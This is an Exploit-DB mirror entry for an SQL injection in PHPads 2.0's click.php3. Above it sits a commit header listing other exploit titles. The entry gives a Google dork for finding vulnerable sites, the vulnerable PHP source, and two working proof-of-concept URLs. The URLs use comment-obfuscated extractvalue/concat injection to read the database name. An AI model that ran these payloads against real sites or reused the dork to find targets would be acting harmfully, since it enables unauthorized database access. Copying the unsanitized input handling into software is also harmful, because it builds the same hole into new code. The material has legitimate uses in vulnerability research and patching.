exploit-db-mirror/exploits/php/webapps/46798.txt
Offensive Security 79a9df09f0 DB: 2019-05-07
13 changes to exploits/shellcodes

iOS 12.1.3 - 'cfprefsd' Memory Corruption

Windows PowerShell ISE - Remote Code Execution
NSClient++ 0.5.2.35 - Privilege Escalation

Windows PowerShell ISE - Remote Code Execution
LG Supersign EZ CMS - Remote Code Execution (Metasploit)
Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)
ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution
PHPads 2.0 - 'click.php3?bannerID' SQL Injection
microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection

Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)
Linux/x86 - shred file Shellcode (72 bytes)
2019-05-07 05:01:58 +00:00

56 lines
No EOL
1.6 KiB
Text

[+] Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores
[+] Date: 05/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: https://blondish.net/
[+] Software Demo : https://github.com/blondishnet/PHPads/blob/master/readme.txt
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:"click.php3?bannerID="" // use your brain ;)
[+] Exploit :
http://host/patch//click.php3?bannerID= [SQL Injection]
[+] Vulnerable File :
<?php
$bannerAdsPath = './ads.dat';
require './ads.inc.php';
///////////////////////////////////////
// Don't Edit Anything Below This Line!
///////////////////////////////////////
for ($i = 0; $i < count($ads); $i++) {
if(ereg('^' .$_GET['id']. '\|\|', $ads[$i])) {
$data = explode('||', $ads[$i]);
if ($_SERVER['REMOTE_ADDR'] != $bannerAds['blockip']) {
$data[ PHPADS_ADELEMENT_CLICKTHRUS ]++;
}
$ads[$i] = join('||', $data);
break;
}
}
if (!$data[PHPADS_ADELEMENT_LINK_URI]) {
die();
}
writeads();
Header("Location: ". $data[PHPADS_ADELEMENT_LINK_URI]);
exit;
?>
[+] PoC :
http://server/phpads/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
http:/server/phpAds/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] EOF